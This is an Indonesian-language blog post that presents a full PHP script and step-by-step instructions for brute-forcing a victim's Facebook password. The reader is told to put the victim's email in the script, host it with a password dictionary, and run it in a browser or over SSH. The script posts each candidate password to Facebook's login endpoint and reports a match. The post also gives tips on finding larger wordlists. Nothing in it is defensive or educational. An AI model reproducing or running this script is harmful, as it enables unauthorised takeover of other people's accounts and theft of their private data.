:Facebook Brute force attack!
BERIKUT LANGKAH-LANGKAHNYA :
Upload 3 file berikut di web hosting kamu (usahakan yang berbayar, atau premium. tapi kalau free, coba silahkan saja )
1.fb.php yang isinya skrip brute force
2.dictionary.txt
3.cookie.txt
ingat harus dalam satu folder
edit bagian ini $username ="brute@force.com";
ganti dgn e-mail korban
jalankan/eksekusi /fb.php .
Oke, ini skrip brute force-nya
Code:
################################ # Face Book Brute Forcer ################################ set_time_limit(0); $username ="brute@force.com"; // username to brute force $dictionary ="dictionary.txt"; // need dictionary to password list function kontrol($kullaniciadi,$sifre){ $useragent = "Opera/9.21 (Windows NT 5.1; U; tr)"; $data = "email=$kullaniciadi&pass=$sifre&login=Login" ; $ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); $source=curl_exec ($ch); curl_close ($ch); if(eregi("Home",$source)){return true;} else {return false;} } if(!is_file($dictionary)){echo "$dictionary is not file";exit;} $lines=file($dictionary); echo "Attack Starting.. "; sleep(10); echo "Attack Started, brute forcing.. "; foreach($lines as $line){ $line=str_replace("\r","",$line); $line=str_replace("\n","",$line); if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P assword found : $line ";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;} else{echo "[-] username:$username , password:$line - Password not found : $line ";} } ?>
File dictionary.txt nya bisa kamu buat sendiri, atau mengambil dari sudah ada. Kalau malas membuat,
.
File cookies.txt kosongkan saja.
Oke, ada 2 cara meng-eksekusi file fb.php/skrip brute force.
1.)
Menggunakan web browser. Cara ini mudah, tapi relatif lebih lama.
Karena kita tahu, kalau modus grafis selalu lebih lamban di banding
modus text. Cara nya tinggal upload semua file2 di atas ke web hosting,
lalu jalankan melalui browser. Gampang kan? tapi ingat kesabaran anda
adalah satu faktor penentu keberhasilan..
2.)Menggunakan
SSH client. Cara ini lebih cepat, tapi relatif lebih sulit. Selain itu
kita juga harus punya web hosting sendiri, coz web hosting gratisan
biasa-nya tidak akan memberi hak SSH pada kita Tolong. Cara-nya kita
harus meng-eksekusi skrip via SSH client/console yang sudah terkoneksi
ke server kita. SSH client favorit saya adalah Putty.
Ingat,
tidak semua FB bisa di crack dengan cara ini... semua tergantung
database dari Dictionary.txt juga dari tingkat kerumitan Password
maka
jika masih tidak anda temukan, gunakan dictionary.txt lain yang bisa
anda dapat dari google search atau database search lainya.
0 komentar:
Posting Komentar